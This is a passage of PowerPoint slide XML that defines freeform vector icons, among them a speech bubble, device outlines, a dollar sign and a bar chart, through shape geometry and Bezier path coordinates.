              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3696A2C1-01BE-4275-8801-2537DDD8C2EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4260220"/>
            <a:ext cx="696677" cy="540380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 215987 w 256"/>
              <a:gd name="T1" fmla="*/ 0 h 236"/>
              <a:gd name="T2" fmla="*/ 409575 w 256"/>
              <a:gd name="T3" fmla="*/ 156234 h 236"/>
              <a:gd name="T4" fmla="*/ 215987 w 256"/>
              <a:gd name="T5" fmla="*/ 312469 h 236"/>
              <a:gd name="T6" fmla="*/ 172789 w 256"/>
              <a:gd name="T7" fmla="*/ 306092 h 236"/>
              <a:gd name="T8" fmla="*/ 28798 w 256"/>
              <a:gd name="T9" fmla="*/ 361890 h 236"/>
              <a:gd name="T10" fmla="*/ 78395 w 256"/>
              <a:gd name="T11" fmla="*/ 277396 h 236"/>
              <a:gd name="T12" fmla="*/ 0 w 256"/>
              <a:gd name="T13" fmla="*/ 156234 h 236"/>
              <a:gd name="T14" fmla="*/ 215987 w 256"/>
              <a:gd name="T15" fmla="*/ 0 h 2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56" h="236">
                <a:moveTo>
                  <a:pt x="135" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="210" y="0"/>
                  <a:pt x="256" y="44"/>
                  <a:pt x="256" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="152"/>
                  <a:pt x="210" y="196"/>
                  <a:pt x="135" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="196"/>
                  <a:pt x="117" y="193"/>
                  <a:pt x="108" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="236"/>
                  <a:pt x="18" y="227"/>
                  <a:pt x="18" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="209"/>
                  <a:pt x="56" y="178"/>
                  <a:pt x="49" y="174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="156"/>
                  <a:pt x="0" y="129"/>
                  <a:pt x="0" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="44"/>
                  <a:pt x="59" y="0"/>
                  <a:pt x="135" y="0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60" name="Freeform 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF776A2-4338-46EB-A275-9A8B121390A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11280853" y="2151678"/>
            <a:ext cx="271038" cy="460962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 198297 w 136"/>
              <a:gd name="T1" fmla="*/ 369887 h 232"/>
              <a:gd name="T2" fmla="*/ 19190 w 136"/>
              <a:gd name="T3" fmla="*/ 369887 h 232"/>
              <a:gd name="T4" fmla="*/ 0 w 136"/>
              <a:gd name="T5" fmla="*/ 350755 h 232"/>
              <a:gd name="T6" fmla="*/ 0 w 136"/>
              <a:gd name="T7" fmla="*/ 19132 h 232"/>
              <a:gd name="T8" fmla="*/ 19190 w 136"/>
              <a:gd name="T9" fmla="*/ 0 h 232"/>
              <a:gd name="T10" fmla="*/ 198297 w 136"/>
              <a:gd name="T11" fmla="*/ 0 h 232"/>
              <a:gd name="T12" fmla="*/ 217487 w 136"/>
              <a:gd name="T13" fmla="*/ 19132 h 232"/>
              <a:gd name="T14" fmla="*/ 217487 w 136"/>
              <a:gd name="T15" fmla="*/ 350755 h 232"/>
              <a:gd name="T16" fmla="*/ 198297 w 136"/>
              <a:gd name="T17" fmla="*/ 369887 h 232"/>
              <a:gd name="T18" fmla="*/ 108744 w 136"/>
              <a:gd name="T19" fmla="*/ 350755 h 232"/>
              <a:gd name="T20" fmla="*/ 121537 w 136"/>
              <a:gd name="T21" fmla="*/ 338000 h 232"/>
              <a:gd name="T22" fmla="*/ 108744 w 136"/>
              <a:gd name="T23" fmla="*/ 325245 h 232"/>
              <a:gd name="T24" fmla="*/ 95950 w 136"/>
              <a:gd name="T25" fmla="*/ 338000 h 232"/>
              <a:gd name="T26" fmla="*/ 108744 w 136"/>
              <a:gd name="T27" fmla="*/ 350755 h 232"/>
              <a:gd name="T28" fmla="*/ 198297 w 136"/>
              <a:gd name="T29" fmla="*/ 38264 h 232"/>
              <a:gd name="T30" fmla="*/ 191900 w 136"/>
              <a:gd name="T31" fmla="*/ 38264 h 232"/>
              <a:gd name="T32" fmla="*/ 25587 w 136"/>
              <a:gd name="T33" fmla="*/ 38264 h 232"/>
              <a:gd name="T34" fmla="*/ 19190 w 136"/>
              <a:gd name="T35" fmla="*/ 38264 h 232"/>
              <a:gd name="T36" fmla="*/ 19190 w 136"/>
              <a:gd name="T37" fmla="*/ 306113 h 232"/>
              <a:gd name="T38" fmla="*/ 25587 w 136"/>
              <a:gd name="T39" fmla="*/ 306113 h 232"/>
              <a:gd name="T40" fmla="*/ 191900 w 136"/>
              <a:gd name="T41" fmla="*/ 306113 h 232"/>
              <a:gd name="T42" fmla="*/ 198297 w 136"/>
              <a:gd name="T43" fmla="*/ 306113 h 232"/>
              <a:gd name="T44" fmla="*/ 198297 w 136"/>
              <a:gd name="T45" fmla="*/ 38264 h 232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136" h="232">
                <a:moveTo>
                  <a:pt x="124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220"/>
                  <a:pt x="136" y="220"/>
                  <a:pt x="136" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="227"/>
                  <a:pt x="131" y="232"/>
                  <a:pt x="124" y="232"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="68" y="220"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="220"/>
                  <a:pt x="76" y="216"/>
                  <a:pt x="76" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="208"/>
                  <a:pt x="72" y="204"/>
                  <a:pt x="68" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="204"/>
                  <a:pt x="60" y="208"/>
                  <a:pt x="60" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="216"/>
                  <a:pt x="64" y="220"/>
                  <a:pt x="68" y="220"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="124" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="24"/>
                  <a:pt x="120" y="24"/>
                  <a:pt x="120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192"/>
                  <a:pt x="12" y="192"/>
                  <a:pt x="12" y="192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4" y="192"/>
                  <a:pt x="124" y="192"/>
                  <a:pt x="124" y="192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="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61" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D93A2B0-9558-47B4-BD1C-983356B0962C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6810283" y="2471198"/>
            <a:ext cx="504917" cy="653002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 299943 w 200"/>
              <a:gd name="T1" fmla="*/ 369887 h 232"/>
              <a:gd name="T2" fmla="*/ 19145 w 200"/>
              <a:gd name="T3" fmla="*/ 369887 h 232"/>
              <a:gd name="T4" fmla="*/ 0 w 200"/>
              <a:gd name="T5" fmla="*/ 350755 h 232"/>
              <a:gd name="T6" fmla="*/ 0 w 200"/>
              <a:gd name="T7" fmla="*/ 19132 h 232"/>
              <a:gd name="T8" fmla="*/ 19145 w 200"/>
              <a:gd name="T9" fmla="*/ 0 h 232"/>
              <a:gd name="T10" fmla="*/ 299943 w 200"/>
              <a:gd name="T11" fmla="*/ 0 h 232"/>
              <a:gd name="T12" fmla="*/ 319088 w 200"/>
              <a:gd name="T13" fmla="*/ 19132 h 232"/>
              <a:gd name="T14" fmla="*/ 319088 w 200"/>
              <a:gd name="T15" fmla="*/ 350755 h 232"/>
              <a:gd name="T16" fmla="*/ 299943 w 200"/>
              <a:gd name="T17" fmla="*/ 369887 h 232"/>
              <a:gd name="T18" fmla="*/ 159544 w 200"/>
              <a:gd name="T19" fmla="*/ 357132 h 232"/>
              <a:gd name="T20" fmla="*/ 172308 w 200"/>
              <a:gd name="T21" fmla="*/ 344378 h 232"/>
              <a:gd name="T22" fmla="*/ 159544 w 200"/>
              <a:gd name="T23" fmla="*/ 331623 h 232"/>
              <a:gd name="T24" fmla="*/ 146780 w 200"/>
              <a:gd name="T25" fmla="*/ 344378 h 232"/>
              <a:gd name="T26" fmla="*/ 159544 w 200"/>
              <a:gd name="T27" fmla="*/ 357132 h 232"/>
              <a:gd name="T28" fmla="*/ 280797 w 200"/>
              <a:gd name="T29" fmla="*/ 38264 h 232"/>
              <a:gd name="T30" fmla="*/ 38291 w 200"/>
              <a:gd name="T31" fmla="*/ 38264 h 232"/>
              <a:gd name="T32" fmla="*/ 38291 w 200"/>
              <a:gd name="T33" fmla="*/ 318868 h 232"/>
              <a:gd name="T34" fmla="*/ 280797 w 200"/>
              <a:gd name="T35" fmla="*/ 318868 h 232"/>
              <a:gd name="T36" fmla="*/ 280797 w 200"/>
              <a:gd name="T37" fmla="*/ 38264 h 23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200" h="232">
                <a:moveTo>
                  <a:pt x="188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5" y="0"/>
                  <a:pt x="200" y="5"/>
                  <a:pt x="200" y="12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100" y="224"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="224"/>
                  <a:pt x="108" y="220"/>
                  <a:pt x="108" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="212"/>
                  <a:pt x="104" y="208"/>
                  <a:pt x="100" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="208"/>
                  <a:pt x="92" y="212"/>
                  <a:pt x="92" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="220"/>
                  <a:pt x="96" y="224"/>
                  <a:pt x="100" y="224"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="176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176" y="200"/>
                  <a:pt x="176" y="200"/>
                  <a:pt x="176" y="200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="176" y="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62" name="Freeform 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C72A11-6D68-40CF-AFA0-137355836AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11306004" y="4595659"/>
            <a:ext cx="237625" cy="381921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 75671 w 36"/>
              <a:gd name="T1" fmla="*/ 205908 h 68"/>
              <a:gd name="T2" fmla="*/ 75671 w 36"/>
              <a:gd name="T3" fmla="*/ 229930 h 68"/>
              <a:gd name="T4" fmla="*/ 72231 w 36"/>
              <a:gd name="T5" fmla="*/ 233362 h 68"/>
              <a:gd name="T6" fmla="*/ 55033 w 36"/>
              <a:gd name="T7" fmla="*/ 233362 h 68"/>
              <a:gd name="T8" fmla="*/ 51594 w 36"/>
              <a:gd name="T9" fmla="*/ 229930 h 68"/>
              <a:gd name="T10" fmla="*/ 51594 w 36"/>
              <a:gd name="T11" fmla="*/ 205908 h 68"/>
              <a:gd name="T12" fmla="*/ 3440 w 36"/>
              <a:gd name="T13" fmla="*/ 181885 h 68"/>
              <a:gd name="T14" fmla="*/ 3440 w 36"/>
              <a:gd name="T15" fmla="*/ 178453 h 68"/>
              <a:gd name="T16" fmla="*/ 17198 w 36"/>
              <a:gd name="T17" fmla="*/ 157863 h 68"/>
              <a:gd name="T18" fmla="*/ 20638 w 36"/>
              <a:gd name="T19" fmla="*/ 157863 h 68"/>
              <a:gd name="T20" fmla="*/ 20638 w 36"/>
              <a:gd name="T21" fmla="*/ 157863 h 68"/>
              <a:gd name="T22" fmla="*/ 65352 w 36"/>
              <a:gd name="T23" fmla="*/ 175022 h 68"/>
              <a:gd name="T24" fmla="*/ 89429 w 36"/>
              <a:gd name="T25" fmla="*/ 154431 h 68"/>
              <a:gd name="T26" fmla="*/ 58473 w 36"/>
              <a:gd name="T27" fmla="*/ 130408 h 68"/>
              <a:gd name="T28" fmla="*/ 3440 w 36"/>
              <a:gd name="T29" fmla="*/ 75499 h 68"/>
              <a:gd name="T30" fmla="*/ 51594 w 36"/>
              <a:gd name="T31" fmla="*/ 27454 h 68"/>
              <a:gd name="T32" fmla="*/ 51594 w 36"/>
              <a:gd name="T33" fmla="*/ 3432 h 68"/>
              <a:gd name="T34" fmla="*/ 55033 w 36"/>
              <a:gd name="T35" fmla="*/ 0 h 68"/>
              <a:gd name="T36" fmla="*/ 72231 w 36"/>
              <a:gd name="T37" fmla="*/ 0 h 68"/>
              <a:gd name="T38" fmla="*/ 75671 w 36"/>
              <a:gd name="T39" fmla="*/ 3432 h 68"/>
              <a:gd name="T40" fmla="*/ 75671 w 36"/>
              <a:gd name="T41" fmla="*/ 27454 h 68"/>
              <a:gd name="T42" fmla="*/ 116946 w 36"/>
              <a:gd name="T43" fmla="*/ 44613 h 68"/>
              <a:gd name="T44" fmla="*/ 116946 w 36"/>
              <a:gd name="T45" fmla="*/ 48045 h 68"/>
              <a:gd name="T46" fmla="*/ 106627 w 36"/>
              <a:gd name="T47" fmla="*/ 68636 h 68"/>
              <a:gd name="T48" fmla="*/ 103188 w 36"/>
              <a:gd name="T49" fmla="*/ 68636 h 68"/>
              <a:gd name="T50" fmla="*/ 99748 w 36"/>
              <a:gd name="T51" fmla="*/ 68636 h 68"/>
              <a:gd name="T52" fmla="*/ 65352 w 36"/>
              <a:gd name="T53" fmla="*/ 54909 h 68"/>
              <a:gd name="T54" fmla="*/ 37835 w 36"/>
              <a:gd name="T55" fmla="*/ 75499 h 68"/>
              <a:gd name="T56" fmla="*/ 72231 w 36"/>
              <a:gd name="T57" fmla="*/ 102954 h 68"/>
              <a:gd name="T58" fmla="*/ 123825 w 36"/>
              <a:gd name="T59" fmla="*/ 154431 h 68"/>
              <a:gd name="T60" fmla="*/ 75671 w 36"/>
              <a:gd name="T61" fmla="*/ 205908 h 68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36" h="68">
                <a:moveTo>
                  <a:pt x="22" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="67"/>
                  <a:pt x="22" y="67"/>
                  <a:pt x="22" y="67"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="67"/>
                  <a:pt x="22" y="68"/>
                  <a:pt x="21" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="68"/>
                  <a:pt x="16" y="68"/>
                  <a:pt x="16" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="68"/>
                  <a:pt x="15" y="67"/>
                  <a:pt x="15" y="67"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="60"/>
                  <a:pt x="15" y="60"/>
                  <a:pt x="15" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="59"/>
                  <a:pt x="1" y="53"/>
                  <a:pt x="1" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="53"/>
                  <a:pt x="0" y="52"/>
                  <a:pt x="1" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="46"/>
                  <a:pt x="5" y="46"/>
                  <a:pt x="5" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="46"/>
                  <a:pt x="5" y="46"/>
                  <a:pt x="6" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="46"/>
                  <a:pt x="6" y="46"/>
                  <a:pt x="6" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="46"/>
                  <a:pt x="12" y="51"/>
                  <a:pt x="19" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="51"/>
                  <a:pt x="26" y="49"/>
                  <a:pt x="26" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="41"/>
                  <a:pt x="22" y="40"/>
                  <a:pt x="17" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="35"/>
                  <a:pt x="1" y="32"/>
                  <a:pt x="1" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="15"/>
                  <a:pt x="7" y="9"/>
                  <a:pt x="15" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="1"/>
                  <a:pt x="15" y="1"/>
                  <a:pt x="15" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="0"/>
                  <a:pt x="15" y="0"/>
                  <a:pt x="16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2" y="0"/>
                  <a:pt x="22" y="0"/>
                  <a:pt x="22" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="8"/>
                  <a:pt x="22" y="8"/>
                  <a:pt x="22" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="8"/>
                  <a:pt x="34" y="13"/>
                  <a:pt x="34" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="13"/>
                  <a:pt x="35" y="14"/>
                  <a:pt x="34" y="14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20"/>
                  <a:pt x="31" y="20"/>
                  <a:pt x="30" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="20"/>
                  <a:pt x="30" y="20"/>
                  <a:pt x="29" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="20"/>
                  <a:pt x="25" y="16"/>
                  <a:pt x="19" y="16"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="16"/>
                  <a:pt x="11" y="18"/>
                  <a:pt x="11" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="26"/>
                  <a:pt x="16" y="28"/>
                  <a:pt x="21" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="32"/>
                  <a:pt x="36" y="36"/>
                  <a:pt x="36" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="52"/>
                  <a:pt x="30" y="59"/>
                  <a:pt x="22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63" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974A3913-8936-42AD-8FE5-D188A5C661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5120" y="4264929"/>
            <a:ext cx="590080" cy="535671"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 7586 w 602"/>
              <a:gd name="T1" fmla="*/ 183789 h 510"/>
              <a:gd name="T2" fmla="*/ 7586 w 602"/>
              <a:gd name="T3" fmla="*/ 183789 h 510"/>
              <a:gd name="T4" fmla="*/ 209531 w 602"/>
              <a:gd name="T5" fmla="*/ 183789 h 510"/>
              <a:gd name="T6" fmla="*/ 217118 w 602"/>
              <a:gd name="T7" fmla="*/ 176206 h 510"/>
              <a:gd name="T8" fmla="*/ 217118 w 602"/>
              <a:gd name="T9" fmla="*/ 173679 h 510"/>
              <a:gd name="T10" fmla="*/ 209531 w 602"/>
              <a:gd name="T11" fmla="*/ 163207 h 510"/>
              <a:gd name="T12" fmla="*/ 7586 w 602"/>
              <a:gd name="T13" fmla="*/ 163207 h 510"/>
              <a:gd name="T14" fmla="*/ 0 w 602"/>
              <a:gd name="T15" fmla="*/ 173679 h 510"/>
              <a:gd name="T16" fmla="*/ 0 w 602"/>
              <a:gd name="T17" fmla="*/ 176206 h 510"/>
              <a:gd name="T18" fmla="*/ 7586 w 602"/>
              <a:gd name="T19" fmla="*/ 183789 h 510"/>
              <a:gd name="T20" fmla="*/ 40822 w 602"/>
              <a:gd name="T21" fmla="*/ 153097 h 510"/>
              <a:gd name="T22" fmla="*/ 40822 w 602"/>
              <a:gd name="T23" fmla="*/ 153097 h 510"/>
              <a:gd name="T24" fmla="*/ 61414 w 602"/>
              <a:gd name="T25" fmla="*/ 153097 h 510"/>
              <a:gd name="T26" fmla="*/ 71530 w 602"/>
              <a:gd name="T27" fmla="*/ 142987 h 510"/>
              <a:gd name="T28" fmla="*/ 71530 w 602"/>
              <a:gd name="T29" fmla="*/ 10110 h 510"/>
              <a:gd name="T30" fmla="*/ 61414 w 602"/>
              <a:gd name="T31" fmla="*/ 0 h 510"/>
              <a:gd name="T32" fmla="*/ 40822 w 602"/>
              <a:gd name="T33" fmla="*/ 0 h 510"/>
              <a:gd name="T34" fmla="*/ 30707 w 602"/>
              <a:gd name="T35" fmla="*/ 10110 h 510"/>
              <a:gd name="T36" fmla="*/ 30707 w 602"/>
              <a:gd name="T37" fmla="*/ 142987 h 510"/>
              <a:gd name="T38" fmla="*/ 40822 w 602"/>
              <a:gd name="T39" fmla="*/ 153097 h 510"/>
              <a:gd name="T40" fmla="*/ 97179 w 602"/>
              <a:gd name="T41" fmla="*/ 153097 h 510"/>
              <a:gd name="T42" fmla="*/ 97179 w 602"/>
              <a:gd name="T43" fmla="*/ 153097 h 510"/>
              <a:gd name="T44" fmla="*/ 117410 w 602"/>
              <a:gd name="T45" fmla="*/ 153097 h 510"/>
              <a:gd name="T46" fmla="*/ 127525 w 602"/>
              <a:gd name="T47" fmla="*/ 142987 h 510"/>
              <a:gd name="T48" fmla="*/ 127525 w 602"/>
              <a:gd name="T49" fmla="*/ 58856 h 510"/>
              <a:gd name="T50" fmla="*/ 117410 w 602"/>
              <a:gd name="T51" fmla="*/ 48385 h 510"/>
              <a:gd name="T52" fmla="*/ 97179 w 602"/>
              <a:gd name="T53" fmla="*/ 48385 h 510"/>
              <a:gd name="T54" fmla="*/ 86703 w 602"/>
              <a:gd name="T55" fmla="*/ 58856 h 510"/>
              <a:gd name="T56" fmla="*/ 86703 w 602"/>
              <a:gd name="T57" fmla="*/ 142987 h 510"/>
              <a:gd name="T58" fmla="*/ 97179 w 602"/>
              <a:gd name="T59" fmla="*/ 153097 h 510"/>
              <a:gd name="T60" fmla="*/ 155703 w 602"/>
              <a:gd name="T61" fmla="*/ 153097 h 510"/>
              <a:gd name="T62" fmla="*/ 155703 w 602"/>
              <a:gd name="T63" fmla="*/ 153097 h 510"/>
              <a:gd name="T64" fmla="*/ 176295 w 602"/>
              <a:gd name="T65" fmla="*/ 153097 h 510"/>
              <a:gd name="T66" fmla="*/ 186411 w 602"/>
              <a:gd name="T67" fmla="*/ 142987 h 510"/>
              <a:gd name="T68" fmla="*/ 186411 w 602"/>
              <a:gd name="T69" fmla="*/ 107240 h 510"/>
              <a:gd name="T70" fmla="*/ 176295 w 602"/>
              <a:gd name="T71" fmla="*/ 97130 h 510"/>
              <a:gd name="T72" fmla="*/ 155703 w 602"/>
              <a:gd name="T73" fmla="*/ 97130 h 510"/>
              <a:gd name="T74" fmla="*/ 145588 w 602"/>
              <a:gd name="T75" fmla="*/ 107240 h 510"/>
              <a:gd name="T76" fmla="*/ 145588 w 602"/>
              <a:gd name="T77" fmla="*/ 142987 h 510"/>
              <a:gd name="T78" fmla="*/ 155703 w 602"/>
              <a:gd name="T79" fmla="*/ 153097 h 51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02" h="510">
                <a:moveTo>
                  <a:pt x="21" y="509"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21" y="509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="580" y="509"/>
                  <a:pt x="580" y="509"/>
                  <a:pt x="580" y="509"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="594" y="509"/>
                  <a:pt x="601" y="502"/>
                  <a:pt x="601" y="488"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601" y="481"/>
                  <a:pt x="601" y="481"/>
                  <a:pt x="601" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601" y="467"/>
                  <a:pt x="594" y="452"/>
                  <a:pt x="580" y="452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="452"/>
                  <a:pt x="21" y="452"/>
                  <a:pt x="21" y="452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="452"/>
                  <a:pt x="0" y="467"/>
                  <a:pt x="0" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="488"/>
                  <a:pt x="0" y="488"/>
                  <a:pt x="0" y="488"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="502"/>
                  <a:pt x="7" y="509"/>
                  <a:pt x="21" y="509"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="424"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170" y="424"/>
                  <a:pt x="170" y="424"/>
                  <a:pt x="170" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="184" y="424"/>
                  <a:pt x="198" y="417"/>
                  <a:pt x="198" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198" y="28"/>
                  <a:pt x="198" y="28"/>
                  <a:pt x="198" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198" y="14"/>
                  <a:pt x="184" y="0"/>
                  <a:pt x="170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92" y="0"/>
                  <a:pt x="85" y="14"/>
                  <a:pt x="85" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="396"/>
                  <a:pt x="85" y="396"/>
                  <a:pt x="85" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="417"/>
                  <a:pt x="92" y="424"/>
                  <a:pt x="113" y="424"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="269" y="424"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="269" y="424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="325" y="424"/>
                  <a:pt x="325" y="424"/>
                  <a:pt x="325" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="424"/>
                  <a:pt x="353" y="417"/>
                  <a:pt x="353" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="353" y="163"/>
                  <a:pt x="353" y="163"/>
                  <a:pt x="353" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="353" y="149"/>
                  <a:pt x="346" y="134"/>
                  <a:pt x="325" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="269" y="134"/>
                  <a:pt x="269" y="134"/>
                  <a:pt x="269" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255" y="134"/>
                  <a:pt x="240" y="149"/>
                  <a:pt x="240" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="396"/>
                  <a:pt x="240" y="396"/>
                  <a:pt x="240" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="417"/>
                  <a:pt x="255" y="424"/>
                  <a:pt x="269" y="424"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="431" y="424"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="431" y="424"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="488" y="424"/>
                  <a:pt x="488" y="424"/>
                  <a:pt x="488" y="424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="502" y="424"/>
                  <a:pt x="516" y="417"/>
                  <a:pt x="516" y="396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="297"/>
                  <a:pt x="516" y="297"/>
                  <a:pt x="516" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="276"/>
                  <a:pt x="502" y="269"/>
                  <a:pt x="488" y="269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
